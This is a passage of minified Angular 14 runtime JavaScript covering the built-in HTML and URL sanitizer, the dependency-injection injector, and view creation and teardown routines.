ph&&t.getTypeName()||null}(t);if(null!=e&&e!==a){if("ResourceURL"===e&&"URL"===a)return!0;throw new Error(`Required a safe ${a}, got a ${e} (see https://g.co/ng/security#xss)`)}return e===a}class lE{constructor(a){this.inertDocumentHelper=a}getInertBodyElement(a){a="<body><remove></remove>"+a;try{const e=(new window.DOMParser).parseFromString(Uf(a),"text/html").body;return null===e?this.inertDocumentHelper.getInertBodyElement(a):(e.removeChild(e.firstChild),e)}catch(e){return null}}}class F0{constructor(a){if(this.defaultDoc=a,this.inertDocument=this.defaultDoc.implementation.createHTMLDocument("sanitization-inert"),null==this.inertDocument.body){const e=this.inertDocument.createElement("html");this.inertDocument.appendChild(e);const i=this.inertDocument.createElement("body");e.appendChild(i)}}getInertBodyElement(a){const e=this.inertDocument.createElement("template");if("content"in e)return e.innerHTML=Uf(a),e;const i=this.inertDocument.createElement("body");return i.innerHTML=Uf(a),this.defaultDoc.documentMode&&this.stripCustomNsAttrs(i),i}stripCustomNsAttrs(a){const e=a.attributes;for(let n=e.length-1;0<n;n--){const c=e.item(n).name;("xmlns:ns1"===c||0===c.indexOf("ns1:"))&&a.removeAttribute(c)}let i=a.firstChild;for(;i;)i.nodeType===Node.ELEMENT_NODE&&this.stripCustomNsAttrs(i),i=i.nextSibling}}const V0=/^(?:(?:https?|mailto|data|ftp|tel|file|sms):|[^&:/?#]*(?:[/?#]|$))/gi;function B0(t){return(t=String(t)).match(V0)?t:"unsafe:"+t}function am(t){const a={};for(const e of t.split(","))a[e]=!0;return a}function Gf(...t){const a={};for(const e of t)for(const i in e)e.hasOwnProperty(i)&&(a[i]=!0);return a}const YM=am("area,br,col,hr,img,wbr"),SC=am("colgroup,dd,dt,li,p,tbody,td,tfoot,th,thead,tr"),JM=am("rp,rt"),H0=Gf(YM,Gf(SC,am("address,article,aside,blockquote,caption,center,del,details,dialog,dir,div,dl,figure,figcaption,footer,h1,h2,h3,h4,h5,h6,header,hgroup,hr,ins,main,map,menu,nav,ol,pre,section,summary,table,ul")),Gf(JM,am("a,abbr,acronym,audio,b,bdi,bdo,big,br,cite,code,del,dfn,em,font,i,img,ins,kbd,label,map,mark,picture,q,ruby,rp,rt,s,samp,small,source,span,strike,strong,sub,sup,time,track,tt,u,var,video")),Gf(JM,SC)),kC=am("background,cite,href,itemtype,longdesc,poster,src,xlink:href"),ev=Gf(kC,am("abbr,accesskey,align,alt,autoplay,axis,bgcolor,border,cellpadding,cellspacing,class,clear,color,cols,colspan,compact,controls,coords,datetime,default,dir,download,face,headers,height,hidden,hreflang,hspace,ismap,itemscope,itemprop,kind,label,lang,language,loop,media,muted,nohref,nowrap,open,preload,rel,rev,role,rows,rowspan,rules,scope,scrolling,shape,size,sizes,span,srclang,srcset,start,summary,tabindex,target,title,translate,type,usemap,valign,value,vspace,width"),am("aria-activedescendant,aria-atomic,aria-autocomplete,aria-busy,aria-checked,aria-colcount,aria-colindex,aria-colspan,aria-controls,aria-current,aria-describedby,aria-details,aria-disabled,aria-dropeffect,aria-errormessage,aria-expanded,aria-flowto,aria-grabbed,aria-haspopup,aria-hidden,aria-invalid,aria-keyshortcuts,aria-label,aria-labelledby,aria-level,aria-live,aria-modal,aria-multiline,aria-multiselectable,aria-orientation,aria-owns,aria-placeholder,aria-posinset,aria-pressed,aria-readonly,aria-relevant,aria-required,aria-roledescription,aria-rowcount,aria-rowindex,aria-rowspan,aria-selected,aria-setsize,aria-sort,aria-valuemax,aria-valuemin,aria-valuenow,aria-valuetext")),fE=am("script,style,template");class U0{constructor(){this.sanitizedSomething=!1,this.buf=[]}sanitizeChildren(a){let e=a.firstChild,i=!0;for(;e;)if(e.nodeType===Node.ELEMENT_NODE?i=this.startElement(e):e.nodeType===Node.TEXT_NODE?this.chars(e.nodeValue):this.sanitizedSomething=!0,i&&e.firstChild)e=e.firstChild;else for(;e;){e.nodeType===Node.ELEMENT_NODE&&this.endElement(e);let n=this.checkClobberedElement(e,e.nextSibling);if(n){e=n;break}e=this.checkClobberedElement(e,e.parentNode)}return this.buf.join("")}startElement(a){const e=a.nodeName.toLowerCase();if(!H0.hasOwnProperty(e))return this.sanitizedSomething=!0,!fE.hasOwnProperty(e);this.buf.push("<"),this.buf.push(e);const i=a.attributes;for(let n=0;n<i.length;n++){const r=i.item(n),c=r.name,d=c.toLowerCase();if(!ev.hasOwnProperty(d)){this.sanitizedSomething=!0;continue}let T=r.value;kC[d]&&(T=B0(T)),this.buf.push(" ",c,'="',G_(T),'"')}return this.buf.push(">"),!0}endElement(a){const e=a.nodeName.toLowerCase();H0.hasOwnProperty(e)&&!YM.hasOwnProperty(e)&&(this.buf.push("</"),this.buf.push(e),this.buf.push(">"))}chars(a){this.buf.push(G_(a))}checkClobberedElement(a,e){if(e&&(a.compareDocumentPosition(e)&Node.DOCUMENT_POSITION_CONTAINED_BY)===Node.DOCUMENT_POSITION_CONTAINED_BY)throw new Error(`Failed to sanitize html because the element is clobbered: ${a.outerHTML}`);return e}}const vl=/[\uD800-\uDBFF][\uDC00-\uDFFF]/g,tv=/([^\#-~ |!])/g;function G_(t){return t.replace(/&/g,"&amp;").replace(vl,function(a){return"&#"+(1024*(a.charCodeAt(0)-55296)+(a.charCodeAt(1)-56320)+65536)+";"}).replace(tv,function(a){return"&#"+a.charCodeAt(0)+";"}).replace(/</g,"&lt;").replace(/>/g,"&gt;")}let q0;function iv(t,a){let e=null;try{q0=q0||function q_(t){const a=new F0(t);return function dE(){try{return!!(new window.DOMParser).parseFromString(Uf(""),"text/html")}catch(t){return!1}}()?new lE(a):a}(t);let i=a?String(a):"";e=q0.getInertBodyElement(i);let n=5,r=i;do{if(0===n)throw new Error("Failed to sanitize html because the input is unstable");n--,i=r,r=e.innerHTML,e=q0.getInertBodyElement(i)}while(i!==r);return Uf((new U0).sanitizeChildren(j_(e)||e))}finally{if(e){const i=j_(e)||e;for(;i.firstChild;)i.removeChild(i.firstChild)}}}function j_(t){return"content"in t&&function jf(t){return t.nodeType===Node.ELEMENT_NODE&&"TEMPLATE"===t.nodeName}(t)?t.content:null}var oo=(()=>((oo=oo||{})[oo.NONE=0]="NONE",oo[oo.HTML=1]="HTML",oo[oo.STYLE=2]="STYLE",oo[oo.SCRIPT=3]="SCRIPT",oo[oo.URL=4]="URL",oo[oo.RESOURCE_URL=5]="RESOURCE_URL",oo))();function Hc(t){const a=Q_();return a?wC(a.sanitize(oo.HTML,t)||""):Fi(t,"HTML")?wC(Bc(t)):iv(function $M(){return void 0!==U_?U_:"undefined"!=typeof document?document:void 0}(),Qa(t))}function nm(t){const a=Q_();return a?a.sanitize(oo.URL,t)||"":Fi(t,"URL")?Bc(t):B0(Qa(t))}function PC(t){const a=Q_();if(a)return XM(a.sanitize(oo.RESOURCE_URL,t)||"");if(Fi(t,"ResourceURL"))return XM(Bc(t));throw new gi(904,!1)}function Q_(){const t=bi();return t&&t[12]}const OC=new ni("ENVIRONMENT_INITIALIZER"),ov=new ni("INJECTOR",-1),rv=new ni("INJECTOR_DEF_TYPES");class sv{get(a,e=pi){if(e===pi){const i=new Error(`NullInjectorError: No provider for ${Wo(a)}!`);throw i.name="NullInjectorError",i}return e}}function CE(...t){return{\u0275providers:cv(0,t)}}function cv(t,...a){const e=[],i=new Set;let n;return zc(a,r=>{const c=r;NC(c,e,[],i)&&(n||(n=[]),n.push(c))}),void 0!==n&&lv(n,e),e}function lv(t,a){for(let e=0;e<t.length;e++){const{providers:n}=t[e];zc(n,r=>{a.push(r)})}}function NC(t,a,e,i){if(!(t=La(t)))return!1;let n=null,r=Yp(t);const c=!r&&Un(t);if(r||c){if(c&&!c.standalone)return!1;n=t}else{const T=t.ngModule;if(r=Yp(T),!r)return!1;n=T}const d=i.has(n);if(c){if(d)return!1;if(i.add(n),c.dependencies){const T="function"==typeof c.dependencies?c.dependencies():c.dependencies;for(const k of T)NC(k,a,e,i)}}else{if(!r)return!1;{if(null!=r.imports&&!d){let k;i.add(n);try{zc(r.imports,q=>{NC(q,a,e,i)&&(k||(k=[]),k.push(q))})}finally{}void 0!==k&&lv(k,a)}if(!d){const k=Qd(n)||(()=>new n);a.push({provide:n,useFactory:k,deps:Xn},{provide:rv,useValue:n,multi:!0},{provide:OC,useValue:()=>At(n),multi:!0})}const T=r.providers;null==T||d||zc(T,q=>{a.push(q)})}}return n!==t&&void 0!==t.providers}const fe=Bn({provide:String,useValue:Bn});function ce(t){return null!==t&&"object"==typeof t&&fe in t}function je(t){return"function"==typeof t}const dt=new ni("Set Injector scope."),_t={},gt={};let kt;function Lt(){return void 0===kt&&(kt=new sv),kt}class Ht{}class ui extends Ht{constructor(a,e,i,n){super(),this.parent=e,this.source=i,this.scopes=n,this.records=new Map,this._ngOnDestroyHooks=new Set,this._onDestroyHooks=[],this._destroyed=!1,Qi(a,c=>this.processProvider(c)),this.records.set(ov,ta(void 0,this)),n.has("environment")&&this.records.set(Ht,ta(void 0,this));const r=this.records.get(dt);null!=r&&"string"==typeof r.value&&this.scopes.add(r.value),this.injectorDefTypes=new Set(this.get(rv.multi,Xn,Da.Self))}get destroyed(){return this._destroyed}destroy(){this.assertNotDestroyed(),this._destroyed=!0;try{for(const a of this._ngOnDestroyHooks)a.ngOnDestroy();for(const a of this._onDestroyHooks)a()}finally{this.records.clear(),this._ngOnDestroyHooks.clear(),this.injectorDefTypes.clear(),this._onDestroyHooks.length=0}}onDestroy(a){this._onDestroyHooks.push(a)}runInContext(a){this.assertNotDestroyed();const e=rr(this),i=Bs(void 0);try{return a()}finally{rr(e),Bs(i)}}get(a,e=pi,i=Da.Default){this.assertNotDestroyed();const n=rr(this),r=Bs(void 0);try{if(!(i&Da.SkipSelf)){let d=this.records.get(a);if(void 0===d){const T=function Mn(t){return"function"==typeof t||"object"==typeof t&&t instanceof ni}(a)&&Hu(a);d=T&&this.injectableDefInScope(T)?ta(Ki(a),_t):null,this.records.set(a,d)}if(null!=d)return this.hydrate(a,d)}return(i&Da.Self?Lt():this.parent).get(a,e=i&Da.Optional&&e===pi?null:e)}catch(c){if("NullInjectorError"===c.name){if((c[pa]=c[pa]||[]).unshift(Wo(a)),n)throw c;return function mh(t,a,e,i){const n=t[pa];throw a[Dr]&&n.unshift(a[Dr]),t.message=function W_(t,a,e,i=null){t=t&&"\n"===t.charAt(0)&&"\u0275"==t.charAt(1)?t.slice(2):t;let n=Wo(a);if(Array.isArray(a))n=a.map(Wo).join(" -> ");else if("object"==typeof a){let r=[];for(let c in a)if(a.hasOwnProperty(c)){let d=a[c];r.push(c+":"+("string"==typeof d?JSON.stringify(d):Wo(d)))}n=`{${r.join(", ")}}`}return`${e}${i?"("+i+")":""}[${n}]: ${t.replace(ca,"\n  ")}`}("\n"+t.message,n,e,i),t.ngTokenPath=n,t[pa]=null,t}(c,a,"R3InjectorError",this.source)}throw c}finally{Bs(r),rr(n)}}resolveInjectorInitializers(){const a=rr(this),e=Bs(void 0);try{const i=this.get(OC.multi,Xn,Da.Self);for(const n of i)n()}finally{rr(a),Bs(e)}}toString(){const a=[],e=this.records;for(const i of e.keys())a.push(Wo(i));return`R3Injector[${a.join(", ")}]`}assertNotDestroyed(){if(this._destroyed)throw new gi(205,!1)}processProvider(a){let e=je(a=La(a))?a:La(a&&a.provide);const i=function Ui(t){return ce(t)?ta(void 0,t.useValue):ta(dn(t),_t)}(a);if(je(a)||!0!==a.multi)this.records.get(e);else{let n=this.records.get(e);n||(n=ta(void 0,_t,!0),n.factory=()=>Bf(n.multi),this.records.set(e,n)),e=a,n.multi.push(a)}this.records.set(e,i)}hydrate(a,e){return e.value===_t&&(e.value=gt,e.value=e.factory()),"object"==typeof e.value&&e.value&&function To(t){return null!==t&&"object"==typeof t&&"function"==typeof t.ngOnDestroy}(e.value)&&this._ngOnDestroyHooks.add(e.value),e.value}injectableDefInScope(a){if(!a.providedIn)return!1;const e=La(a.providedIn);return"string"==typeof e?"any"===e||this.scopes.has(e):this.injectorDefTypes.has(e)}}function Ki(t){const a=Hu(t),e=null!==a?a.factory:Qd(t);if(null!==e)return e;if(t instanceof ni)throw new gi(204,!1);if(t instanceof Function)return function Ni(t){const a=t.length;if(a>0)throw ud(a,"?"),new gi(204,!1);const e=function W2(t){const a=t&&(t[Ll]||t[vf]);if(a){const e=function cs(t){if(t.hasOwnProperty("name"))return t.name;const a=(""+t).match(/^function\s*([^\s(]+)/);return null===a?"":a[1]}(t);return console.warn(`DEPRECATED: DI is instantiating a token "${e}" that inherits its @Injectable decorator but does not provide one itself.\nThis will become an error in a future version of Angular. Please add @Injectable() to the "${e}" class.`),a}return null}(t);return null!==e?()=>e.factory(t):()=>new t}(t);throw new gi(204,!1)}function dn(t,a,e){let i;if(je(t)){const n=La(t);return Qd(n)||Ki(n)}if(ce(t))i=()=>La(t.useValue);else if(function _e(t){return!(!t||!t.useFactory)}(t))i=()=>t.useFactory(...Bf(t.deps||[]));else if(function ge(t){return!(!t||!t.useExisting)}(t))i=()=>At(La(t.useExisting));else{const n=La(t&&(t.useClass||t.provide));if(!function na(t){return!!t.deps}(t))return Qd(n)||Ki(n);i=()=>new n(...Bf(t.deps))}return i}function ta(t,a,e=!1){return{factory:t,value:a,multi:e?[]:void 0}}function qa(t){return!!t.\u0275providers}function Qi(t,a){for(const e of t)Array.isArray(e)?Qi(e,a):qa(e)?Qi(e.\u0275providers,a):a(e)}class Yn{}class qc{resolveComponentFactory(a){throw function Ka(t){const a=Error(`No component factory found for ${Wo(t)}. Did you add it to @NgModule.entryComponents?`);return a.ngComponent=t,a}(a)}}let On=(()=>{class t{}return t.NULL=new qc,t})();function Ps(){return Gc(nr(),bi())}function Gc(t,a){return new mi(pc(t,a))}let mi=(()=>{class t{constructor(e){this.nativeElement=e}}return t.__NG_ELEMENT_ID__=Ps,t})();function yc(t){return t instanceof mi?t.nativeElement:t}class qs{}let wr=(()=>{class t{}return t.__NG_ELEMENT_ID__=()=>function _h(){const t=bi(),e=us(nr().index,t);return(ms(e)?e:t)[11]}(),t})(),gh=(()=>{class t{}return t.\u0275prov=hi({token:t,providedIn:"root",factory:()=>null}),t})();class nc{constructor(a){this.full=a,this.major=a.split(".")[0],this.minor=a.split(".")[1],this.patch=a.split(".").slice(2).join(".")}}const Ch=new nc("14.2.6"),Ul={};function AE(t){return t.ngOriginalError}class yh{constructor(){this._console=console}handleError(a){const e=this._findOriginalError(a);this._console.error("ERROR",a),e&&this._console.error("ORIGINAL ERROR",e)}_findOriginalError(a){let e=a&&AE(a);for(;e&&AE(e);)e=AE(e);return e||null}}const TE=new Map;let cee=0;const DE="__ngContext__";function bc(t,a){ms(a)?(t[DE]=a[20],function dee(t){TE.set(t[20],t)}(a)):t[DE]=a}function zC(t){return t.ownerDocument.defaultView}function Qc(t){return t.ownerDocument}function bh(t){return t instanceof Function?t():t}var Al=(()=>((Al=Al||{})[Al.Important=1]="Important",Al[Al.DashCase=2]="DashCase",Al))();function wE(t,a){return undefined(t,a)}function WC(t){const a=t[3];return Is(a)?a[3]:a}function IE(t){return iR(t[13])}function RE(t){return iR(t[4])}function iR(t){for(;null!==t&&!Is(t);)t=t[4];return t}function j0(t,a,e,i,n){if(null!=i){let r,c=!1;Is(i)?r=i:ms(i)&&(c=!0,i=i[0]);const d=Ar(i);0===t&&null!==e?null==n?cR(a,e,d):K_(a,e,d,n||null,!0):1===t&&null!==e?K_(a,e,d,n||null,!0):2===t?function pR(t,a,e){const i=dv(t,a);i&&function Nee(t,a,e,i){t.removeChild(a,e,i)}(t,i,a,e)}(a,d,c):3===t&&a.destroyNode(d),null!=r&&function Wee(t,a,e,i,n){const r=e[7];r!==Ar(e)&&j0(a,t,i,r,n);for(let d=10;d<e.length;d++){const T=e[d];FC(T[1],T,t,a,i,r)}}(a,t,r,e,n)}}function kE(t,a,e){return t.createElement(a,e)}function nR(t,a){const e=t[9],i=e.indexOf(a),n=a[3];512&a[2]&&(a[2]&=-513,rd(n,-1)),e.splice(i,1)}function PE(t,a){if(t.length<=10)return;const e=10+a,i=t[e];if(i){const n=i[17];null!==n&&n!==t&&nR(n,i),a>0&&(t[e-1][4]=i[4]);const r=rh(t,10+a);!function xee(t,a){FC(t,a,a[11],2,null,null),a[0]=null,a[6]=null}(i[1],i);const c=r[19];null!==c&&c.detachView(r[1]),i[3]=null,i[4]=null,i[2]&=-65}return i}function oR(t,a){if(!(128&a[2])){const e=a[11];e.destroyNode&&FC(t,a,e,3,null,null),function Ree(t){let a=t[13];if(!a)return OE(t[1],t);for(;a;){let e=null;if(ms(a))e=a[13];else{const i=a[10];i&&(e=i)}if(!e){for(;a&&!a[4]&&a!==t;)ms(a)&&OE(a[1],a),a=a[3];null===a&&(a=t),ms(a)&&OE(a[1],a),e=a&&a[4]}a=e}}(a)}}function OE(t,a){if(!(128&a[2])){a[2]&=-65,a[2]|=128,function Oee(t,a){let e;if(null!=t&&null!=(e=t.destroyHooks))for(let i=0;i<e.length;i+=2){const n=a[e[i]];if(!(n instanceof ld)){const r=e[i+1];if(Array.isArray(r))for(let c=0;c<r.length;c+=2){const d=n[r[c]],T=r[c+1];try{T.call(d)}finally{}}else try{r.call(n)}finally{}}}}(t,a),function Pee(t,a){const e=t.cleanup,i=a[7];let n=-1;if(null!==e)for(let r=0;r<e.length-1;r+=2)if("string"==typeof e[r]){const c=e[r+1],d="function"==typeof c?c(a):Ar(a[c]),T=i[n=e[r+2]],k=e[r+3];"boolean"==typeof k?d.removeEventListener(e[r],T,k):k>=0?i[n=k]():i[n=-k].unsubscribe(),r+=2}else{const c=i[n=e[r+1]];e[r].call(c)}if(null!==i){for(let r=n+1;r<i.length;r++)(0,i[r])();a[7]=null}}(t,a),1===a[1].type&&a[11].destroy();const e=a[17];if(null!==e&&Is(a[3])){e!==a[3]&&nR(e,a);const i=a[19];null!==i&&i.detachView(t)}!function mee(t){TE.delete(t[20])}(a)}}function rR(t,a,e){return function sR(t,a,e){let i=a;for(;null!==i&&40&i.type;)i=(a=i).parent;if(null===i)return e[0];if(2&i.flags){const n=t.data[i.directiveStart].encapsulation;if(n===dc.None||n===dc.Emulated)return null}return pc(i,e)}(t,a.parent,e)}function K_(t,a,e,i,n){t.insertBefore(a,e,i,n)}function cR(t,a,e){t.appendChild(a,e)}function lR(t,a,e,i,n){null!==i?K_(t,a,e,i,n):cR(t,a,e)}function dv(t,a){return t.parentNode(a)}function dR(t,a,e){return uR(t,a,e)}let uR=function mR(t,a,e){return 40&t.type?pc(t,e):null};function mv(t,a,e,i){const n=rR(t,i,a),r=a[11],d=dR(i.parent||a[6],i,a);if(null!=n)if(Array.isArray(e))for(let T=0;T<e.length;T++)lR(r,n,e[T],d,!1);else lR(r,n,e,d,!1)}function uv(t,a){if(null!==a){const e=a.type;if(3&e)return pc(a,t);if(4&e)return LE(-1,t[a.index]);if(8&e){const i=a.child;if(null!==i)return uv(t,i);{const n=t[a.index];return Is(n)?LE(-1,n):Ar(n)}}if(32&e)return wE(a,t)()||Ar(t[a.index]);{const i=fR(t,a);return null!==i?Array.isArray(i)?i[0]:uv(WC(t[16]),i):uv(t,a.next)}}return null}function fR(t,a){return null!==a?t[16][6].projection[a.projection]:null}function LE(t,a){const e=10+t+1;if(e<a.length){const i=a[e],n=i[1].firstChild;if(null!==n)return uv(i,n)}return a[7]}function zE(t,a,e,i,n,r,c){for(;null!=e;){const d=i[e.index],T=e.type;if(c&&0===a&&(d&&bc(Ar(d),i),e.flags|=4),64!=(64&e.flags))if(8&T)zE(t,a,e.child,i,n,r,!1),j0(a,t,n,d,r);else if(32&T){const k=wE(e,i);let q;for(;q=k();)j0(a,t,n,q,r);j0(a,t,n,d,r)}else 16&T?_R(t,a,i,e,n,r):j0(a,t,n,d,r);e=c?e.projectionNext:e.next}}function FC(t,a,e,i,n,r){zE(e,i,t.firstChild,a,n,r,!1)}function _R(t,a,e,i,n,r){const c=e[16],T=c[6].projection[i.projection];if(Array.isArray(T))for(let k=0;k<T.length;k++)j0(a,t,n,T[k],r);else zE(t,a,T,c[3],n,r,!0)}function gR(t,a,e){t.setAttribute(a,"style",e)}function WE(t,a,e){""===e?t.removeAttribute(a,"class"):t.setAttribute(a,"class",e)}function CR(t,a,e){let i=t.length;for(;;){const n=t.indexOf(a,e);if(-1===n)return n;if(0===n||t.charCodeAt(n-1)<=32){const r=a.length;if(n+r===i||t.charCodeAt(n+r)<=32)return n}e=n+1}}const yR="ng-template";function Vee(t,a,e){let i=0;for(;i<t.length;){let n=t[i++];if(e&&"class"===n){if(n=t[i],-1!==CR(n.toLowerCase(),a,0))return!0}else if(1===n){for(;i<t.length&&"string"==typeof(n=t[i++]);)if(n.toLowerCase()===a)return!0;return!1}}return!1}function bR(t){return 4===t.type&&t.value!==yR}function Bee(t,a,e){return a===(4!==t.type||e?t.value:yR)}function Hee(t,a,e){let i=4;const n=t.attrs||[],r=function Gee(t){for(let a=0;a<t.length;a++)if(th(t[a]))return a;return t.length}(n);let c=!1;for(let d=0;d<a.length;d++){const T=a[d];if("number"!=typeof T){if(!c)if(4&i){if(i=2|1&i,""!==T&&!Bee(t,T,e)||""===T&&1===a.length){if(om(i))return!1;c=!0}}else{const k=8&i?T:a[++d];if(8&i&&null!==t.attrs){if(!Vee(t.attrs,k,e)){if(om(i))return!1;c=!0}continue}const Y=Uee(8&i?"class":T,n,bR(t),e);if(-1===Y){if(om(i))return!1;c=!0;continue}if(""!==k){let te;te=Y>r?"":n[Y+1].toLowerCase();const pe=8&i?te:null;if(pe&&-1!==CR(pe,k,0)||2&i&&k!==te){if(om(i))return!1;c=!0}}}}else{if(!c&&!om(i)&&!om(T))return!1;if(c&&om(T))continue;c=!1,i=T|1&i}}return om(i)||c}function om(t){return 0==(1&t)}function Uee(t,a,e,i){if(null===a)return-1;let n=0;if(i||!e){let r=!1;for(;n<a.length;){const c=a[n];if(c===t)return n;if(3===c||6===c)r=!0;else{if(1===c||2===c){let d=a[++n];for(;"string"==typeof d;)d=a[++n];continue}if(4===c)break;if(0===c){n+=4;continue}}n+=r?1:2}return-1}return function jee(t,a){let e=t.indexOf(4);if(e>-1)for(e++;e<t.length;){const i=t[e];if("number"==typeof i)return-1;if(i===a)return e;e++}return-1}(a,t)}function MR(t,a,e=!1){for(let i=0;i<a.length;i++)if(Hee(t,a[i],e))return!0;return!1}function Qee(t,a){e:for(let e=0;e<a.length;e++){const i=a[e];if(t.length===i.length){for(let n=0;n<t.length;n++)if(t[n]!==i[n])continue e;return!0}}return!1}function vR(t,a){return t?":not("+a.trim()+")":a}function $ee(t){let a=t[0],e=1,i=2,n="",r=!1;for(;e<t.length;){let c=t[e];if("string"==typeof c)if(2&i){const d=t[++e];n+="["+c+(d.length>0?'="'+d+'"':"")+"]"}else 8&i?n+="."+c:4&i&&(n+=" "+c);else""!==n&&!om(c)&&(a+=vR(r,n),n=""),i=c,r=r||!om(i);e++}return""!==n&&(a+=vR(r,n)),a}const mn={};function C(t){AR(Rn(),bi(),Ss()+t,!1)}function AR(t,a,e,i){if(!i)if(3==(3&a[2])){const r=t.preOrderCheckHooks;null!==r&&ji(a,r,e)}else{const r=t.preOrderHooks;null!==r&&Zu(a,r,0,e)}fl(e)}function xR(t,a=null,e=null,i){const n=wR(t,a,e,i);return n.resolveInjectorInitializers(),n}function wR(t,a=null,e=null,i,n=new Set){const r=[e||Xn,CE(t)];return i=i||("object"==typeof t?void 0:Wo(t)),new ui(r,a||Lt(),i||null,n)}let Ko=(()=>{class t{static create(e,i){var n;if(Array.isArray(e))return xR({name:""},i,e,"");{const r=null!==(n=e.name)&&void 0!==n?n:"";return xR({name:r},e.parent,e.providers,r)}}}return t.THROW_IF_NOT_FOUND=pi,t.NULL=new sv,t.\u0275prov=hi({token:t,providedIn:"any",factory:()=>At(ov)}),t.__NG_ELEMENT_ID__=-1,t})();function Ee(t,a=Da.Default){const e=bi();return null===e?At(t,a):Zd(nr(),e,La(t),a)}function pd(){throw new Error("invalid")}function fv(t,a){return t<<17|a<<2}function rm(t){return t>>17&32767}function UE(t){return 2|t}function Mh(t){return(131068&t)>>2}function qE(t,a){return-131069&t|a<<2}function GE(t){return 1|t}function GR(t,a){const e=t.contentQueries;if(null!==e)for(let i=0;i<e.length;i+=2){const n=e[i],r=e[i+1];if(-1!==r){const c=t.data[r];C_(n),c.contentQueries(2,a[r],r)}}}function gv(t,a,e,i,n,r,c,d,T,k,q){const Y=a.blueprint.slice();return Y[0]=n,Y[2]=76|i,(null!==q||t&&1024&t[2])&&(Y[2]|=1024),u_(Y),Y[3]=Y[15]=t,Y[8]=e,Y[10]=c||t&&t[10],Y[11]=d||t&&t[11],Y[12]=T||t&&t[12]||null,Y[9]=k||t&&t[9]||null,Y[6]=r,Y[20]=function lee(){return cee++}(),Y[21]=q,Y[16]=2==a.type?t[16]:Y,Y}function $0(t,a,e,i,n){let r=t.data[a];if(null===r)r=function ZE(t,a,e,i,n){const r=Pf(),c=Xu(),T=t.data[a]=function Rte(t,a,e,i,n,r){return{type:e,index:i,insertBeforeIndex:null,injectorIndex:a?a.injectorIndex:-1,directiveStart:-1,directiveEnd:-1,directiveStylingLast:-1,propertyBindings:null,flags:0,providerIndexes:0,value:n,attrs:r,mergedAttrs:null,localNames:null,initialInputs:void 0,inputs:null,outputs:null,tViews:null,next:null,projectionNext:null,child:null,parent:a,projection:null,styles:null,stylesWithoutHost:null,residualStyles:void 0,classes:null,classesWithoutHost:null,residualClasses:void 0,classBindings:0,styleBindings:0}}(0,c?r:r&&r.parent,e,a,i,n);return null===t.firstChild&&(t.firstChild=T),null!==r&&(c?null==r.child&&null!==T.parent&&(r.child=T):null===r.next&&(r.next=T)),T}(t,a,e,i,n),function y0(){return Ua.lFrame.inI18n}()&&(r.flags|=64);else if(64&r.type){r.type=e,r.value=i,r.attrs=n;const c=function Kd(){const t=Ua.lFrame,a=t.currentTNode;return t.isParent?a:a.parent}();r.injectorIndex=null===c?-1:c.injectorIndex}return _c(r,!0),r}function K0(t,a,e,i){if(0===e)return-1;const n=a.length;for(let r=0;r<e;r++)a.push(i),t.blueprint.push(i),t.data.push(null);return n}function eD(t,a,e){y_(a);try{const i=t.viewQuery;null!==i&&cD(1,i,e);const n=t.template;null!==n&&jR(t,a,n,1,e),t.firstCreatePass&&(t.firstCreatePass=!1),t.staticContentQueries&&GR(t,a),t.staticViewQueries&&cD(2,t.viewQuery,e);const r=t.components;null!==r&&function xte(t,a){for(let e=0;e<a.length;e++)jte(t,a[e])}(a,r)}catch(i){throw t.firstCreatePass&&(t.incompleteFirstPass=!0,t.firstCreatePass=!1),i}finally{a[2]&=-5,M_()}}function Cv(t,a,e,i){const n=a[2];if(128!=(128&n)){y_(a);try{u_(a),function C0(t){return Ua.lFrame.bindingIndex=t}(t.bindingStartIndex),null!==e&&jR(t,a,e,2,i);const c=3==(3&n);if(c){const k=t.preOrderCheckHooks;null!==k&&ji(a,k,null)}else{const k=t.preOrderHooks;null!==k&&Zu(a,k,0,null),v_(a,0)}if(function qte(t){for(let a=IE(t);null!==a;a=RE(a)){if(!a[2])continue;const e=a[9];for(let i=0;i<e.length;i++){const n=e[i],r=n[3];0==(512&n[2])&&rd(r,1),n[2]|=512}}}(a),function Ute(t){for(let a=IE(t);null!==a;a=RE(a))for(let e=10;e<a.length;e++){const i=a[e],n=i[1];Um(i)&&Cv(n,i,n.template,i[8])}}(a),null!==t.contentQueries&&GR(t,a),c){const k=t.contentCheckHooks;null!==k&&ji(a,k)}else{const k=t.contentHooks;null!==k&&Zu(a,k,1),v_(a,1)}!function Ete(t,a){const e=t.hostBindingOpCodes;if(null!==e)try{for(let i=0;i<e.length;i++){const n=e[i];if(n<0)fl(~n);else{const r=n,c=e[++i],d=e[++i];Gm(c,r),d(2,a[r])}}}finally{fl(-1)}}(t,a);const d=t.components;null!==d&&function Dte(t,a){for(let e=0;e<a.length;e++)Gte(t,a[e])}(a,d);const T=t.viewQuery;if(null!==T&&cD(2,T,i),c){const k=t.viewCheckHooks;null!==k&&ji(a,k)}else{const k=t.viewHooks;null!==k&&Zu(a,k,2),v_(a,2)}!0===t.firstUpdatePass&&(t.firstUpdatePass=!1),a[2]&=-41,512&a[2]&&(a[2]&=-513,rd(a[3],-1))}finally{M_()}}}function jR(t,a,e,i,n){const r=Ss(),c=2&i;try{fl(-1),c&&a.length>22&&AR(t,a,22,!1),e(i,n)}finally{fl(r)}}function QR(t,a,e){if(Gu(a)){const n=a.directiveEnd;for(let r=a.directiveStart;r<n;r++){const c=t.data[r];c.contentQueries&&c.contentQueries(1,e[r],r)}}}function tD(t,a,e){!Ku()||(function Nte(t,a,e,i){const n=e.directiveStart,r=e.directiveEnd;t.firstCreatePass||ah(e,a),bc(i,a);const c=e.initialInputs;for(let d=n;d<r;d++){const T=t.data[d],k=gr(T);k&&Vte(a,e,T);const q=Xm(a,t,d,e);bc(q,a),null!==c&&Bte(0,d-n,q,T,0,c),k&&(us(e.index,a)[8]=q)}}(t,a,e,pc(e,a)),128==(128&e.flags)&&function Lte(t,a,e){const i=e.directiveStart,n=e.directiveEnd,r=e.index,c=function nC(){return Ua.lFrame.currentDirectiveIndex}();try{fl(r);for(let d=i;d<n;d++){const T=t.data[d],k=a[d];g_(d),(null!==T.hostBindings||0!==T.hostVars||null!==T.hostAttrs)&&eS(T,k)}}finally{fl(-1),g_(c)}}(t,a,e))}function iD(t,a,e=pc){const i=a.localNames;if(null!==i){let n=a.index+1;for(let r=0;r<i.length;r+=2){const c=i[r+1],d=-1===c?e(a,t):t[c];t[n++]=d}}}function $R(t){const a=t.tView;return null===a||a.incompleteFirstPass?t.tView=aD(1,null,t.template,t.decls,t.vars,t.directiveDefs,t.pipeDefs,t.viewQuery,t.schemas,t.consts):a}function aD(t,a,e,i,n,r,c,d,T,k){const 